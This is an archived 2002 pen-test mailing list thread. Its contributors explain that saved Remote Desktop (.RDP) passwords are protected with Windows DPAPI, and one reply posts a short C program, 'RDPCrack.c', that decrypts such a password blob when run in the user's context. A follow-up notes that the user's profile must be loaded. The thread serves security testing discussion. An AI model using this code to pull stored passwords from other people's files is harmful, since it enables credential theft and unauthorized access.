RE: Saved Terminal Server Sessions

From: Michael Howard (mikehow@microsoft.com)
Date: Tue Dec 31 2002 - 14:31:34 EST


You will also need to load the user's profile, simply impersonating may
not work...

Cheers, Michael
Secure Windows Initiative
Writing Secure Code 2nd Edition
http://www.microsoft.com/mspress/books/5957.asp

-----Original Message-----
From: Nicolas RUFF [mailto:nicolas.ruff@edelweb.fr]
Sent: Tuesday, December 31, 2002 2:03 AM
To: pen-test

st0ff st0ff wrote:
> Hi all -
> Terminal Server Client or Remote Desktop Client are
> providing to save the appropriate user credentials. A
> plaintext file is used for that. But the password is
> encrypted in there. Is there a tool available to crack
> this?

Hi,

I guess you are talking about ".RDP" files. The password is encrypted
using the CryptProtectData() standard API. You can use the code below
(from MSDN), to decrypt it ; however you will have to impersonate the
user somehow to make this code run, because the encryption key used is
derivated from the user context (the Windows logon password I guess).

- Nicolas RUFF
-----------------------------------
Security Consultant @ EdelWeb
nicolas.ruff@edelweb.fr
-----------------------------------

//--------------------------------------------------------------------
// RDPCrack.c
//
// This is modified sample code from MSDN // This code requires Windows
2000 or XP // Don't forget to link CRYPT32.LIB //

#include <stdio.h>
#include <windows.h>
#include <wincrypt.h>

void HandleError(char *s);

void main()
{
DATA_BLOB DataOut;
DATA_BLOB DataVerify;
LPWSTR pDescrOut = NULL;
BYTE *pbDataOutput;
DWORD cbDataOutput;
int data;

// Put encrypted password string here
char szEncodedPwd[] =
"01000000D08C9DDF0115D1118C7A00C04FC297EB01000000A5C6A9949D6D804898C5037
8542C8AE40000000008000000700073007700000003660000A8000000100000008038592
82E66C6AFF273047E0D9C1D8A0000000004800000A000000010000000E60DE7216CBEC1F
108E86A1A21D7CDA1080200009878C213C72E84F0777A4D9E0B3F339906618C3F07727A7
9E1E1E923FCF50B3C5514246AD4117ADCFD4CF603AD5EEDA2A1692AFB4CAF32FEE468B6E
6C564FAADFC64E901CE784CA72081DF762B15D498F2C2488F9AAFC271B5B7D1DA2A4AA0B
585605024BCC18141213E6C9CBF3FCB1E2F032693580E63589D4342C8038E289F179147A
A85B06462E35F6C2E83C29BCA2EDACC754F76A3D7DAA666EDF5D615036BAE280211B602D
3F931F7AC22C26D5B3C1E7360757FE4CBAF3D5BAD23F1F06A6572F79A81552600E7F4453
5935F3908B6642E382D19FD7072C87174EF4144FA724368827DB7ACAA412242FDC215059
5A43974FF5C3BA18CE764F46C2F783740A6C250FC5F9350A09804C0E776BFE6B9D10F60E
219FC078F02E13F90DD9730FC598EBABE4AAB75C5C64D3A51BB0CC90470AAB85A921384C
929012A60A68BC893D3AA320032836B40D43637789724C2DE79217DA3BA7E77544489049
97DAFBB308EAD210ED51FAF1F8C5ABD6B057F728AE1F836974A1D

58017821C804EB2B1DB3897F7F31247CA55377379F1B05D69F2BDEAC5BE5BFD95E754F4A
69D2301222C72AE2200200092E56C69F66E15913E13B821CA78BEA70DC8CA2F682EFE01E
69B52E6218FE5FB5FAFF0DA7E17257748F1B35F0E3507D7A13146CBDFF6155FEE6B8CEF2
F5CFF1E0D66D0B5D7C4234E07D23319BA1C6317C0CDAA9A80499DD4B57A66886A677E631
744714000000257F2ED4678E73B1D0CF2338B471F6A507A7FE9F0";

// String conversion
cbDataOutput = ( (strlen(szEncodedPwd)) / 2 ); pbDataOutput = (BYTE
*)malloc( cbDataOutput + 1 ); if (pbDataOutput == NULL) HandleError("Not
enough memory.");

for (unsigned int i=0; i<(cbDataOutput); i++) {
     sscanf(&(szEncodedPwd[i+i]), "%02x", &data);
     pbDataOutput[i] = data;
}
DataOut.pbData = pbDataOutput;
DataOut.cbData = cbDataOutput;

// Decryption
if (CryptUnprotectData(
         &DataOut, // [in] Input data
     &pDescrOut, // (Optional) [out] Description string
         NULL, // (Optional) [in] Entropy (not used by MS)
         NULL, // Reserved
         NULL, // (Optional) PromptStruct
         0, // Flags
         &DataVerify)) // [out] Output data
{
     wprintf(L"The decrypted data is: %s\n", (WCHAR
*)DataVerify.pbData);
     printf("The description of the data was: %S\n", pDescrOut); } else
{
     HandleError("Decryption error!");
}

LocalFree(pDescrOut);
free(DataOut.pbData);
LocalFree(DataVerify.pbData);
}

void HandleError(char *s)
{
     fprintf(stderr, "An error occurred in running the program. \n");
     fprintf(stderr, "%s\n",s);
     fprintf(stderr, "Error number %x.\n", GetLastError());
     fprintf(stderr, "Program terminating. \n");
     exit(1);
}

------------------------------------------------------------------------

----
This list is provided by the SecurityFocus Security Intelligence Alert
(SIA) Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please
see:
https://alerts.securityfocus.com/
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/


This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:26 EDT